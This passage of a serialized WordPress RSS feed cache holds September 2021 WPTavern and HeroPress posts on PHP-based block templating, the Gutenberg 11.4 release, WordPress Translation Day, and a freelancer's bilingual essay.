Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"WPTavern: A World Where (Some) Block Development Is Merely a Templating System With No Build Process?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122154\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:241:\"https://wptavern.com/a-world-where-some-block-development-is-merely-a-templating-system-with-no-build-process?utm_source=rss&utm_medium=rss&utm_campaign=a-world-where-some-block-development-is-merely-a-templating-system-with-no-build-process\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6447:\"<p class=\"has-drop-cap\">What if WordPress developers lived in a world where we could create PHP-based templates that would output data on the front end and handle editable fields via the block editor? Or, we had a system where we could create blocks without a build step?</p>\n\n\n\n<p>While there are many reasons the modern WordPress editor is not the best fit for everyone just yet, one stumbling block has been building custom interface components. The ecosystem has a deep history of creating bespoke solutions for clients using PHP. These have been custom meta boxes and form fields in the classic editor screen for the most part. When WordPress 5.0 launched with its block editor, it turned the world upside down, often leaving agencies and freelancers with no way to move forward without dedicating massive resources to learning React to build blocks or interact with the new editing screen.</p>\n\n\n\n<p><em>The solution?</em> Stick with what you know. It was cheaper and already seemed to do the job well.</p>\n\n\n\n<p>As we talk about the <a href=\"https://wptavern.com/wordpress-classic-editor-support-extended-for-at-least-another-year\">support window for the Classic Editor</a> plugin, the WordPress project needs people to provide tools for this segment of the ecosystem if it ever plans on bringing them along for the ride. Solutions such as ACF Pro and Genesis Custom Blocks have bridged some of the technical gaps. However, the user experience can be sub-par when using server-side rendering in the block editor. That method works well for some types of blocks but not all. We need to take this one step more.</p>\n\n\n\n<p>Mark Jaquith, a lead WordPress developer, shared a few questions from Helen Hou-Sand&iacute;, another lead developer, around this idea and a basic concept about <a href=\"https://twitter.com/markjaquith/status/1432461667187765251\">what this might look like</a>:</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Weekend exploration, egged on and sparked by <a href=\"https://twitter.com/helenhousandi?ref_src=twsrc%5Etfw\">@helenhousandi</a>:<br /><br />&ldquo;What if building custom blocks for the Block Editor was as easy as supplying attributes and a block of HTML? What if this produced React editing code and PHP rendering code without a build step?&rdquo; <a href=\"https://t.co/r86Phu88SX\">pic.twitter.com/r86Phu88SX</a></p>&mdash; Mark Jaquith (@markjaquith) <a href=\"https://twitter.com/markjaquith/status/1432461667187765251?ref_src=twsrc%5Etfw\">August 30, 2021</a></blockquote>\n</div>\n\n\n\n<p>Hou-Sand&iacute; followed this with a <a href=\"https://helen.blog/2021/08/exploring-custom-blocks-from-a-php-centric-developer-ux-point-of-view/\">detailed post on the concept</a>, but she pointed out that this is merely an exploratory phase. </p>\n\n\n\n<p>&ldquo;The React-based WordPress block editor (sometimes referred to as Gutenberg) is a powerful tool for WYSIWYG editing that continues to prove to be somewhere between a speed bump and a roadblock for long-time WordPress developers who historically have been more PHP-centric,&rdquo; she wrote in the post.</p>\n\n\n\n<p>If you are a WordPress developer, there is a not-so-small chance that you are thinking, <em>Yep, I have hit a few of those speed bumps and crashed into that roadblock a few times.</em> This is unlikely news to you. What might start winning hearts and minds is acknowledging and understanding where much of the problem lies for custom development.</p>\n\n\n\n<p>&ldquo;By leveraging the familiar parts of PHP-based templating and creating a bridge that demonstrates the power of React when combined with the markup and styling already being done for the front-end, we can de-duplicate code, help demystify the critical role of JavaScript in modernizing WordPress, and serve as an on-ramp for PHP-centric developers to create compelling and delightful 1:1 live preview editing experiences,&rdquo; wrote Hou-Sand&iacute;.</p>\n\n\n\n<p>This all boils down to the process of, essentially, writing some template code that works on both the front-end and editor without all the complexities of currently setting up and building blocks. That is an exciting prospect, evidenced by the numerous likes, retweets, and replies to Jaquith&rsquo;s tweet.</p>\n\n\n\n<p>Hou-Sand&iacute; pointed out that the current thought process is primarily about easing the transition for custom client block solutions and not necessarily for WordPress itself. However, that does not mean that this or a similar solution might not be a part of the core platform&rsquo;s future.</p>\n\n\n\n<p>Gutenberg project lead Mat&iacute;as Ventura <a href=\"https://twitter.com/matias_ventura/status/1432648540501729281\">replied to Ben Gillbanks</a> in the same Twitter thread that it was definitely something they were considering. &ldquo;From a core perspective we had to ensure the primitives and interactivity is not compromised, but there&rsquo;s no reason why that should imply a full JS toolchain for simpler blocks. Lowering barrier of entry is important.&rdquo;</p>\n\n\n\n<p>Like several others, Gillbanks thought that such a system would have made an easier transition for PHP-centric developers <a href=\"https://twitter.com/BinaryMoon/status/1432623688503922690\">from the start</a>. However, the project was not ready for that at the time, <a href=\"https://twitter.com/matias_ventura/status/1432638250422833153\">according to Ventura</a>.</p>\n\n\n\n<p>&ldquo;It&rsquo;s tricky to do something like this from the start until the compile target APIs are robust enough,&rdquo; he tweeted. &ldquo;We are getting to a point where many of the interactive properties are clustered into primitives and components, which makes a templating approach more appealing.&rdquo;</p>\n\n\n\n<p>Automattic developer Riad Benguella shared a similar solution in the past week, launching the <a href=\"https://github.com/youknowriad/blocky\">Blocky project</a> on GitHub. With his approach, developers utilize the <code>block.json</code> file to create the template or view component and run it through a simple build step to generate the block&rsquo;s code.</p>\n\n\n\n<p>While it is not too early to hope and dream, it may just be a bit premature to begin seriously considering whether such tools will land in core WordPress. However, seeing some of the lead WordPress and Gutenberg developers at least openly talking about solutions is something worth paying attention to.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Sep 2021 01:37:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:116:\"WPTavern: Gutenberg 11.4 Overhauls Galleries, Adds Axial Padding for Buttons, and Lays Groundwork for Global Spacing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122156\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:273:\"https://wptavern.com/gutenberg-11-4-overhauls-galleries-adds-axial-padding-for-buttons-and-lays-groundwork-for-global-spacing?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-11-4-overhauls-galleries-adds-axial-padding-for-buttons-and-lays-groundwork-for-global-spacing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6285:\"<p class=\"has-drop-cap\">Another two weeks have flown by, and another <a href=\"https://make.wordpress.org/core/2021/09/01/whats-new-in-gutenberg-11-4-1-september/\">Gutenberg plugin update</a> is in the books. I always look forward to the latest release, awaiting what goodies our contributor community has produced. Sometimes I jump the gun and install a development version of the plugin to understand an upcoming feature, such as the new &ldquo;block gap&rdquo; style setting. Other times, I like to be surprised with enhancements like the new vertical/horizontal padding controls for the Button block.</p>\n\n\n\n<p>Of course, there is always a good chance that a plugin update will throw off our theme&rsquo;s editor styles in a new and exciting way. It feels like it has been a while since Gutenberg caught me off guard. At least it is <em>only</em> the post title this go-round. The WP Tavern theme is aging a bit anyway. It is due for an update (<em>hint, hint</em>).</p>\n\n\n\n<p>Aside from block gap and axial padding, Gutenberg 11.4 turns the Gallery block into a container for nested Image blocks and adds duotone filter support to featured images. Other notable enhancements include an option for adding alt text to the Cover block and font-weight support to the Post Date, Post Terms, and Site Tagline blocks.</p>\n\n\n\n<h2>Axial Padding for Button Block</h2>\n\n\n\n<img />Adjusting vertical and horizontal Button padding.\n\n\n\n<p class=\"has-drop-cap\">The Button block now supports changing the <a href=\"https://github.com/WordPress/gutenberg/pull/33859\">spacing along the X or Y axis</a> when unlinking the padding. Previously, users could define the padding for all sides, but this could be tedious work. In most designs, top and bottom (vertical) padding should match, and left and right (horizontal) should get the same treatment.</p>\n\n\n\n<p>This change should speed up padding customization in nearly all cases. However, it does introduce a regression. The consensus in the ticket was that the tradeoff for a less cumbersome experience was worth less flexibility for edge cases.</p>\n\n\n\n<p>Overall, this should be a win for most. I am already a happier user.</p>\n\n\n\n<h2>Gallery Block Uses Nested Images</h2>\n\n\n\n<img />Adding a link to an Image block within a Gallery.\n\n\n\n<p class=\"has-drop-cap\">The Gallery block in Gutenberg 11.4 supports <a href=\"https://github.com/WordPress/gutenberg/pull/25940\">nesting individual Image blocks</a>. It is currently hidden behind an experimental support flag and must be enabled via the Gutenberg &gt; Experiments settings screen.</p>\n\n\n\n<p>Effectively, the Gallery block is now a container. Inserting media still works the same way. The difference is that end-users have access to customize each Image block within a Gallery separately.</p>\n\n\n\n<p>One use case for this feature is to allow users to add custom links around images. However, they now have access to more of the Image block&rsquo;s options, such as custom theme styles.</p>\n\n\n\n<p>Last week, I <a href=\"https://wptavern.com/gallery-block-refactor-expected-to-land-in-wordpress-5-9\">covered this feature in-depth</a> because it is expected to land in WordPress 5.9, and theme authors should be ready for the transition. This is a breaking change in terms of HTML. Any themer with custom Gallery block styles should test the front-end and editor output before WordPress merges the changes.</p>\n\n\n\n<h2>Featured Image Duotone Support</h2>\n\n\n\n<img />Applying a duotone filter to the Post Featured Image block.\n\n\n\n<p class=\"has-drop-cap\">While we are still missing an <a href=\"https://github.com/WordPress/gutenberg/issues/33789\">image size control</a>, I will take any Post Featured Image block improvements I can get at this point. The block felt like a second-class citizen for so long that I am giddy about any enhancements.</p>\n\n\n\n<p>Duotone filters, which landed in WordPress 5.8, allow end-users to add a CSS filter over images to control shadow and highlight colors. Themes can register custom ones, or users can modify them. The latest Gutenberg plugin update <a href=\"https://github.com/WordPress/gutenberg/pull/34113\">brings this feature</a> to the Post Featured Image block.</p>\n\n\n\n<p>This change allows theme authors to explore adding some visual flair since the Post Featured Image block is meant for templating or site editing. It still has a long way to go before it is ready for more advanced theme design, but the tools are getting us closer.</p>\n\n\n\n<h2>Global Block &ldquo;Gap&rdquo; for Themes</h2>\n\n\n\n<img />Highlighting a Paragraph block and its preceding &ldquo;gap&rdquo; (top margin).\n\n\n\n<p class=\"has-drop-cap\">One custom feature that has become commonplace with themes that support the block editor is a &ldquo;global spacing&rdquo; style rule, which controls the whitespace between elements. Gutenberg contributors have noticed this trend and are now <a href=\"https://github.com/WordPress/gutenberg/pull/33812\">shipping a standard solution</a> for it. Themes that use a <code>theme.json</code> file will automatically opt into support.</p>\n\n\n\n<p>The gap feature adds a top margin to all adjacent sibling elements within block containers. This creates the space between each block using a standard method. Theme authors can control this via the <code>styles.spacing.blockGap</code> key in their <code>theme.json</code> files.</p>\n\n\n\n<p>If you are a theme developer, this is one of the most crucial components of block theming from a pure design viewpoint. It is not something to avoid until it lands in WordPress. The time to test and provide feedback is now.</p>\n\n\n\n<p>It is also merely a first step. There are pieces left to implement and problems to solve. There is currently an <a href=\"https://github.com/WordPress/gutenberg/pull/33991\">open pull request</a> to bring this to editor block controls. There is also <a href=\"https://github.com/WordPress/gutenberg/issues/34441\">another ticket</a> for zeroing out the margins for the first and last blocks, which would typically not need any. There are still some open questions on how to best deal with exceptions to the default block gap in the original ticket.</p>\n\n\n\n<p>Regardless of its unfinished nature, it is an exciting development if you care anything at all about vertical rhythm in design systems.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Sep 2021 00:29:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"WPTavern: WordPress Translation Day 2021 Kicks Off September 1, Expanded to Month-Long Event\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122052\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:227:\"https://wptavern.com/wordpress-translation-day-2021-kicks-off-september-1-expanded-to-month-long-event?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-translation-day-2021-kicks-off-september-1-expanded-to-month-long-event\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3580:\"<img />WordPress Translation Day 2021\n\n\n\n<p><a href=\"https://wptranslationday.org/\">WordPress Translation Day</a> kicked off today, and the event has been expanded to run from September 1-30 this year. WordPress Polyglots contributors from all over the world will be hosting mini-events throughout the month where they will be translating <a href=\"https://make.wordpress.org/polyglots/handbook/translating/projects-to-translate/\">themes, plugins, apps, meta, docs, and other important projects.</a>&nbsp;Events will also focus on recruitment, virtual training for new PTEs/GTEs, and general process improvements.</p>\n\n\n\n<p>In the past, the event has been a boon for the Polyglots contributor base. In 2020, the teams hosted more than 20 local events, resulting in more than 175,000 strings translated. French, Spanish, and Japanese-language locales logged the most translated strings during the first week last year. </p>\n\n\n\n<p>There are currently seven mini-events <a href=\"https://wptranslationday.org/wptd-2021/local-events/\">scheduled</a> for 2021 in different locales throughout the month of September. From Portugal to Tehran to Jakarta, contributors are planning sprints to translate popular plugins and WordPress core. In Bengaluru, one of the largest IT hubs in India, organizers will be onboarding new translators, including high school students who are interested in contributing to WordPress.</p>\n\n\n\n<p>WordPress Translation Day will also include some <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">global events</a> during the second half of the month. These events will be hosted in English and contributors of all experience levels are welcome to attend: </p>\n\n\n\n<ul><li><strong>Friday, September 17th&nbsp;(time to be announced):&nbsp;</strong>Introduction to WordPress Translation Day</li><li><strong>Sunday, September 19th at 12:00 UTC:</strong>&nbsp;Panel on Polyglots Tools</li><li><strong>Tuesday, September 21st at 11:00 UTC:&nbsp;</strong>Panel on Open Source Translation Communities</li><li><strong>Thursday, September 30th (time to be announced):</strong>&nbsp;Closing Party &ndash; Why do you translate?</li></ul>\n\n\n\n<p>Attendees will be able to participate live as the events are broadcasted on YouTube. The final session will recap the month&rsquo;s events, highlight success stories, and will also include some activities and games. </p>\n\n\n\n<p>This year translators are extending their volunteer efforts to some newer projects, including working with the Training Team to translate video workshops hosted on learn.wordpress.org, <a href=\"https://make.wordpress.org/community/2021/07/07/tuesday-trainings-how-to-translate-community-team-resources/\">translating Community team resources</a>, translating the <a href=\"https://translate.wordpress.org/projects/patterns/core/\">Block Patterns project</a>, and&nbsp;<a href=\"https://translate.wordpress.org/projects/meta/pattern-directory/\">translating</a>&nbsp;the&nbsp;<a href=\"https://wordpress.org/patterns/\">Pattern Directory</a>&nbsp;itself. </p>\n\n\n\n<p>The global events combined with the local mini-events are essentially like a virtual Polyglots WordCamp held over the span of a month. Attendees will have opportunities to connect with other translators and team leaders and share their experiences contributing to WordPress. If you are new and thinking of joining the Polyglots team, check out the new&nbsp;<a href=\"https://learn.wordpress.org/course/polyglots-contributor-training/\">Polyglots Training course</a>&nbsp;on Learn WordPress.org to find out more about contributing.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 01 Sep 2021 17:21:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"HeroPress: Being a freelancer can be the most stable thing in Taco land\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=4088\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:194:\"https://heropress.com/essays/being-a-freelancer-can-be-the-most-stable-thing-in-taco-land/#utm_source=rss&utm_medium=rss&utm_campaign=being-a-freelancer-can-be-the-most-stable-thing-in-taco-land\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8822:\"<img width=\"1024\" height=\"512\" src=\"https://heropress.com/wp-content/uploads/2021/09/083121-min.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: With WordPress magical things can happen.\" /><p><a href=\"https://heropress.com/feed/#espanol\">Este ensayo también está disponible en español.</a></p>\n<p>I am a very lucky person. I studied software engineering at a private university, I&#8217;m white, straight, handsome, and I live in Taco land.</p>\n<p>I could have easily joined a multinational but there was always something that stopped me. It was probably that I felt I didn&#8217;t fit into the office world.</p>\n<p>My friends became engineers looking to create video games. Someone succeeded there, but then the company where he worked was closed. All I knew was that I wanted to do something with computers and graphics. You study the closest thing to what you have in your head but the reality is always different.</p>\n<p>I like programming but I am not passionate about it. I’m in love with visuals, so creating web pages with a platform as friendly as WordPress fit perfectly with my profile. Since I like to write and join puzzles, plugins and now Gutenberg blocks have made literally everything fit in my work.</p>\n<p>Working for projects instead of for a single company has given me the opportunity to see many worlds.</p>\n<h3>The word WordPress has given me a lot in life</h3>\n<p>Like when a client found me on Google searching for a specialist WordPress developer to ensure that a film festival website was always online.</p>\n<blockquote><p>With WordPress magical things can happen, such as getting to know Brazil thanks to this project and since I had continuity, they looked for me again for the next edition to go back in person.</p></blockquote>\n<p>But then you learn some business.</p>\n<p>I put the condition that they also pay the plane ticket to my then girlfriend. I threw in such a condition thinking that they would not do it, but it was accepted.</p>\n<p>And you think: budgets must be exercised and the peace of mind of having someone in person is worth more than you think.</p>\n<h3>With WordPress, every time you give it comes back to you</h3>\n<p>Like when in 2013 I opened the help group on Facebook: WordPress Guadalajara and by sharing bits of my daily knowledge, people began to position me as the person they should turn to.</p>\n<p>It is not that you share knowledge for the benefit, but somehow it always multiplies. In the community you meet people who inspire you and who make you reflect on where you stand and thanks to whom.</p>\n<p>I want to talk now about my wife, she is also white and privileged. She did not finish university because she has always been rather self-taught, she dropped out when she realized that the level was not what she was looking for, so she found great teachers outside. She sells her drawings and for a long time she made more money than me.</p>\n<p>Besides life, money is something we share. I sold her website to her ten years ago and she is the most talented artist I know, <a href=\"https://instagram.com/dianamartinart\">you should meet her.</a></p>\n<p>One day an acquaintance dared to ask me what it felt like for her to pay the bills. When you are young it makes you want to argue with everyone. What makes me laugh is that at some point my wife is going to make a lot more money than me again. In the meantime it&#8217;s nice to move forward together in Taco Land.</p>\n<blockquote><p>As time goes by, you realize that it is a good idea to choose your battles. And that there are things that you can achieve little by little if you have enough continuity.</p></blockquote>\n<p>For many years they asked me if I continued making web pages, or if that making pages was still profitable&#8230;</p>\n<p>Making web pages is a fundamental part of my life. Along with the tacos, my dogs and my wife.</p>\n<p>It seems that if you offer a good service, making web pages turns out to be more stable than working for any multinational. So it has been for me.</p>\n<p>Even in the pandemic I have had more clients than ever, of course, helped by a great team such as my partner and star web designer, Nina, who taught me how specialists who work independently for the common good can join together.</p>\n<h1 id=\"espanol\">Ser freelancer puede ser lo más estable en el país de los tacos</h1>\n<p>Soy una persona con mucha suerte. Estudié una ingeniería de software en una universidad privada, soy blanco, heterosexual, guapo y vivo en el país de los tacos.</p>\n<p>Fácilmente pude unirme a una multinacional pero siempre hubo algo que me lo impidió. Probablemente fue que sentía que no encajaba en el mundo de las oficinas.</p>\n<p>Mis amigos se hicieron ingenieros buscando crear videojuegos. Por ahí uno lo logró pero luego cerraron la empresa donde trabajaba. Yo lo único que sabía era que quería hacer algo gráfico con computadoras. Uno estudia lo más parecido a lo que tiene en su cabeza pero la realidad siempre es otra.</p>\n<p>Me gusta la programación pero no me apasiona. A mí me enamoras con lo visual y la creación de páginas web con una plataforma tan amigable como WordPress encajó perfecto con mi perfil. Como me gusta redactar y unir rompecabezas, los plugins y ahora los bloques de Gutenberg han hecho que literalmente todo encaje en mi trabajo.</p>\n<p>Trabajar por proyectos en vez de para una sola empresa me ha brindado la oportunidad de conocer muchos mundos.</p>\n<h3>La palabra WordPress me ha dado mucho en la vida</h3>\n<p>Como cuando una clienta me encontró en Google buscando a un desarrollador especialista en WordPress para garantizar que el sitio web de un festival de cine estuviera siempre en línea.</p>\n<blockquote><p>Con WordPress pueden pasar cosas mágicas, como conocer Brasil gracias a este proyecto y si tienes continuidad, que te vuelvan a buscar para la siguiente edición y volver a ir presencialmente.</p></blockquote>\n<p>Pero entonces aprendes de negocios.</p>\n<p>Puse la condición de que también le pagaran el boleto de avión a mi en ese entonces novia. Yo solté esa condición pensando que no lo harían, pero sí se logró.</p>\n<p>Y piensas: los presupuestos se deben de ejercer y la tranquilidad de tener a alguien presencial vale más de lo que uno cree.</p>\n<h3>Con WordPress cada vez que das se te regresa</h3>\n<p>Como cuando en 2013 abrí el grupo de ayuda en Facebook WordPress Guadalajara y al compartir pedacitos de mis conocimientos diarios la gente me fue ubicando como la persona a la que debían de acudir.</p>\n<p>No es que compartas por el beneficio, pero de alguna manera este se va multiplicando. En la comunidad conoces gente que te inspira y que te hace reflexionar sobre dónde estás parado y gracias a quien.</p>\n<p>Quiero hablar ahora de mi esposa, ella también es blanca y privilegiada. No terminó la universidad porque siempre ha sido más bien autodidacta, se salió cuando se dio cuenta de que el nivel no era lo que buscaba, pero tuvo grandes maestros por fuera. Vende sus dibujos y por mucho tiempo hacía más dinero que yo.</p>\n<p>Además de la vida, el dinero es algo que compartimos. A ella le vendí su sitio web hace diez años y es la artista más talentosa que conozco, <a href=\"https://instagram.com/dianamartinart\">deberías de conocerla.</a></p>\n<p>Una vez un conocido se atrevió a decirme que qué se sentía que ella me mantuviera. Cuando eres joven te dan ganas de discutir con todo mundo. Lo que me da risa es que es muy probable que en algún momento mi esposa vaya a hacer mucho más dinero que yo de nuevo. Pero es bonito avanzar juntos en el país de los tacos.</p>\n<blockquote><p>Conforme pasa el tiempo te das cuenta de que es buena idea elegir tus batallas. Y que hay cosas que puedes lograr poco a poco si tienes la continuidad suficiente.</p></blockquote>\n<p>Por muchos años me preguntaban si seguía haciendo páginas web, o que si eso de hacer páginas era todavía algo que dejara dinero&#8230;</p>\n<p>Hacer páginas web es una parte fundamental de mi vida. Junto con los tacos, mis perritas y mi mujer.</p>\n<p>Pareciera que si ofreces un buen servicio, hacer páginas web resulta ser más estable que trabajar para cualquier multinacional. Así lo ha sido para mí.</p>\n<p>Incluso en la pandemia he tenido más clientes que nunca, claro, ayudado de un gran equipo de trabajo como lo es mi socia y diseñadora web estrella, Nina, quien me enseñó sobre cómo pueden unirse especialistas que trabajen de forma independiente por un bien común.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/being-a-freelancer-can-be-the-most-stable-thing-in-taco-land/\">Being a freelancer can be the most stable thing in Taco land</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 01 Sep 2021 13:01:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Jos Velasco\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WPTavern: Gutenberg Contributors Get Organized to Move Block-Based Navigation Forward\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122056\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:215:\"https://wptavern.com/gutenberg-contributors-get-organized-to-move-block-based-navigation-forward?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-contributors-get-organized-to-move-block-based-navigation-forward\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4489:\"<p>The block-based&nbsp;Navigation editor&nbsp;screen&nbsp;got a status check last week as part of a Hallway Hangout <a href=\"https://make.wordpress.org/core/2021/08/25/hallway-hangout-summary-compare-and-contrast-the-navigation-screens/?mc_cid=c38e4d6475&mc_eid=68ffa9a210\">meeting</a> aimed at identifying what needs to happen to bring the screen out from behind the &ldquo;experimental&rdquo; flag. Once the Navigation screen is available by default in the Gutenberg plugin, the team working on the feature will be able to gather more feedback. </p>\n\n\n\n<p>&ldquo;The navigation block and navigation screen projects have been underway for quite some time and are a main target for 5.9,&rdquo; Gutenberg lead developer Matias Ventura said in a <a 